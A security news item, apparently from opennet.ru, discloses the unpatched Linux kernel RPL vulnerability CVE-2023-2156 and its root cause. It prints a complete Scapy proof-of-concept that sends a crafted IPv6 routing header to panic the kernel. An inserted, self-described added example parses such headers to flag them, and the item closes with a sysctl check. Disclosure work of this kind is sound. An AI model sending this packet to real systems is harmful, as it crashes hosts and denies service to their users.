Details of an unpatched (0-day) vulnerability (CVE-2023-2156) in the Linux kernel have been disclosed. It allows a system to be halted by sending specially crafted IPv6 packets (a "packet of death"). The problem only occurs when support for RPL (Routing Protocol for Low-Power and Lossy Networks) is enabled. RPL is disabled by default in distributions and is used mainly on embedded devices operating in wireless networks with high packet loss.
The vulnerability is caused by incorrect handling of external data in the RPL protocol parsing code, which leads to an assert failure and puts the kernel into a panic state. When the data obtained from parsing the IPv6 RPL packet header is placed into the sk_buff (Socket Buffer) structure, and the CmprI field is set to 15, the Segleft field to 1, and CmprE to 0, the 48-byte address vector is decompressed to 528 bytes, and the memory allocated for the buffer turns out to be insufficient. In this case the skb_push function, which is used to push data into the structure, detects the mismatch between the size of the data and the buffer and triggers a panic to prevent a write beyond the buffer boundary.
Exploit example:

```python
# We'll use Scapy to craft the packet
from scapy.all import *
import socket
import sys

# Use the IPv6 from your LAN interface
DST_ADDR = sys.argv[1]
SRC_ADDR = DST_ADDR

# We use sockets to send the packet
sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)

# Craft the packet
#   Type = 3 makes this an RPL packet
#   Addresses contains 3 addresses, but because CmprI is 15,
#   each octet of the first two addresses is treated as a compressed address
#   Segleft = 1 to trigger the amplification
#   lastentry = 0xf0 sets CmprI to 15 and CmprE to 0
p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(type=3, addresses=["a8::", "a7::", "a6::"], segleft=1, lastentry=0xf0)

# Send this evil packet
sockfd.sendto(bytes(p), (DST_ADDR, 0))
```
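The size arithmetic described above, as an added example that is not part of the original article: it parses an RPL source routing header using the RFC 6554 layout and reports how large the address vector becomes once decompressed, which is the condition an inspection rule would flag. The function names, the alert threshold and the sample headers are assumptions constructed for illustration.

```python
# Added example (not from the original article): flag RPL source routing
# headers (RFC 6554, routing type 3) whose compressed address vector
# expands far beyond its on-wire size.
import struct

RPL_ROUTING_TYPE = 3
MAX_EXPANSION = 4  # assumed alert threshold: decompressed / on-wire ratio


def inspect_rpl_srh(hdr: bytes) -> dict:
    """Parse one routing extension header and size its decompressed form."""
    if len(hdr) < 8:
        raise ValueError("truncated routing header")
    _nexthdr, hdrlen, rtype, segleft, word = struct.unpack("!BBBBI", hdr[:8])
    if rtype != RPL_ROUTING_TYPE:
        raise ValueError("not an RPL source routing header")
    cmpri, cmpre, pad = word >> 28, (word >> 24) & 0xF, (word >> 20) & 0xF
    wire = hdrlen * 8                      # bytes of address data + padding
    if len(hdr) < 8 + wire:
        raise ValueError("header shorter than Hdr Ext Len claims")
    # RFC 6554: n = ((HdrExtLen*8 - Pad - (16 - CmprE)) / (16 - CmprI)) + 1
    body = wire - pad - (16 - cmpre)
    if body < 0 or body % (16 - cmpri):
        raise ValueError("inconsistent CmprI/CmprE/Pad for this length")
    n = body // (16 - cmpri) + 1
    full = n * 16                          # every entry becomes a 16-byte address
    return {"cmpri": cmpri, "cmpre": cmpre, "segleft": segleft,
            "addresses": n, "wire_bytes": wire, "decompressed_bytes": full,
            "suspicious": segleft > 0 and full > MAX_EXPANSION * wire}


def make_header(cmpri, cmpre, segleft, addr_bytes):
    """Build a constructed sample header (hypothetical helper)."""
    word = (cmpri << 28) | (cmpre << 24)
    return struct.pack("!BBBBI", 59, len(addr_bytes) // 8, 3, segleft, word) + addr_bytes


# Constructed samples: the field values the article describes, and a benign
# header carrying one uncompressed address.
described = inspect_rpl_srh(make_header(15, 0, 1, bytes(48)))
benign = inspect_rpl_srh(make_header(0, 0, 1, bytes(16)))

if __name__ == "__main__":
    print(described)
    print(benign)
```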
It is notable that the kernel developers were informed of the vulnerability back in January 2022 and over the past 15 months tried to fix the problem three times, releasing patches in September 2022, October 2022 and April 2023, but each time the fix was insufficient and the vulnerability could still be reproduced. Eventually the ZDI project, which coordinated the work on fixing the vulnerability, decided to publish detailed information about it without waiting for a working fix to become available in the kernel.
Thus the vulnerability remains unfixed. In particular, the patch included in the 6.4-rc2 kernel is ineffective. Users are advised to check that the RPL protocol is not in use on their systems, which can be done with the command sysctl -a | grep -i rpl_seg_enabled
Source: opennet.ru
